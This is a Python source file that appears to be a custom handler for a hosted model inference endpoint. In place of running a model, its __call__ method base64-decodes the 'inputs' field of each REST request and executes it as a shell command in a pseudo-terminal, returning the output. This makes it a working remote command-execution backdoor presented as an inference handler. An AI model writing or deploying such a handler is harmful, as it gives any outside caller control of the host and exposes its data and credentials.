import os import pty import subprocess import select import shlex import base64 class EndpointHandler: def __init__(self, *args, **kwargs): pass def run_command(self, command): def read_output(fd): output = b"" while True: r, _, _ = select.select([fd], [], [], 0.1) if fd in r: data = os.read(fd, 1024) if not data: break output += data else: break return output master_fd, slave_fd = pty.openpty() try: process = subprocess.Popen( shlex.split(command), stdin=slave_fd, stdout=slave_fd, stderr=slave_fd, text=True, ) output = b"" while process.poll() is None: output += read_output(master_fd) # Capture any remaining output after the process has finished output += read_output(master_fd) process.wait() finally: os.close(master_fd) os.close(slave_fd) return output.decode() def _decode_base64(self, command): try: decoded_command = base64.b64decode(command).decode() except Exception as e: return command return decoded_command def __call__(self, data): """ :param data: input data from the inference endpoint REST API :return: output data """ # get inputs command = data.pop("inputs", None) command = self._decode_base64(command) if not isinstance(command, str): return {"error": "inputs attribute is required"} # run command result = self.run_command(command) return {"result": result}